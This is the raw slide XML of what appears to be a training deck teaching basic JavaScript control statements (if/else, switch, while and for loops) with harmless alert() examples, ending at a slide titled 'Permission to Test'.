              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Chooses between two conditions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The else block is optional</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" i="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>condition</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" b="1" i="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" b="1" i="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" i="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>	code if condition is true</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" b="1" i="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>else</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" i="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>	code if condition is not true</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" b="1" i="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Example conditions:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="600" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>n == 42</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>varName != "Lions"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="151556" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4648200" y="1630680"/>
            <a:ext cx="41910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3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="800100" indent="-34290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buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Switch Statement</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Chooses between multiple conditions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Each case runs until a break is encountered</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>If no break, multiple cases will run</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Default condition is optional</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>switch(n)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>	case 1:  </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>execute code </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" b="1" i="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>	break;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" b="1" i="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>	case 2:  </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>		execute code </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" b="1" i="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>		break;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>	default:  </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>		default code </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>Case statements can match on integers or strings</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0">
              <a:latin typeface="Courier New" charset="0"/>
              <a:cs typeface="Courier New" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>	case "Pen-Test":</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itle 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="0"/>
            <a:ext cx="7772400" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Control Statements</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="152579" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="152400" y="914400"/>
            <a:ext cx="8553450" cy="4648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3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="800100" indent="-342900" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1257300" indent="-3429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buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>While Loop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Continues running the code block until the end value condition is met</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>while (i&lt;=10)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>{    </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>	alert(i) // Pops up a dialog with the value of i</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>	i++  // increments variable</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1500" b="1" i="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>For Loop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Runs the code block a specified number of times</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>for (x=0;x&lt;=5;x++)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>{    </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>	alert("Knock, knock")</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>	alert("Banana")</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>	x++</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1500" b="1" i="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>alert("Knock, knock");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>alert("Orange");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>alert("Orange you glad I didn't say 'Banana'");</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="152580" name="Group 12"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="6688138" y="2362200"/>
            <a:ext cx="2303462" cy="4114800"/>
            <a:chOff x="6934200" y="2971800"/>
            <a:chExt cx="1905000" cy="3402293"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="152581" name="Picture 4"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3">
              <a:lum bright="-8000" contrast="10000"/>
              <a:extLst>
                <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                  <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                </a:ext>
              </a:extLst>
            </a:blip>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6934200" y="2971800"/>
              <a:ext cx="1905000" cy="815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2582" name="Picture 5"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4">
              <a:lum bright="-8000" contrast="10000"/>
              <a:extLst>
                <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                  <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                </a:ext>
              </a:extLst>
            </a:blip>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6934200" y="3391343"/>
              <a:ext cx="1905000" cy="815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2583" name="Picture 6"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3">
              <a:lum bright="-8000" contrast="10000"/>
              <a:extLst>
                <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                  <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                </a:ext>
              </a:extLst>
            </a:blip>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6934200" y="3810885"/>
              <a:ext cx="1905000" cy="815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2584" name="Picture 7"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4">
              <a:lum bright="-8000" contrast="10000"/>
              <a:extLst>
                <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                  <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                </a:ext>
              </a:extLst>
            </a:blip>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6934200" y="4300352"/>
              <a:ext cx="1905000" cy="815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2585" name="Picture 9"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3">
              <a:lum bright="-8000" contrast="10000"/>
              <a:extLst>
                <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                  <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                </a:ext>
              </a:extLst>
            </a:blip>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6934200" y="4719895"/>
              <a:ext cx="1905000" cy="815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2586" name="Picture 8"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5">
              <a:lum bright="-8000" contrast="10000"/>
              <a:extLst>
                <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                  <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                </a:ext>
              </a:extLst>
            </a:blip>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6934200" y="5139437"/>
              <a:ext cx="1905000" cy="815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2587" name="Picture 10"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId6">
              <a:lum bright="-8000" contrast="10000"/>
              <a:extLst>
                <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                  <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                </a:ext>
              </a:extLst>
            </a:blip>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6934200" y="5558981"/>
              <a:ext cx="1904999" cy="815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latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Permission to Test</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20483" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="670560" y="1569720"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
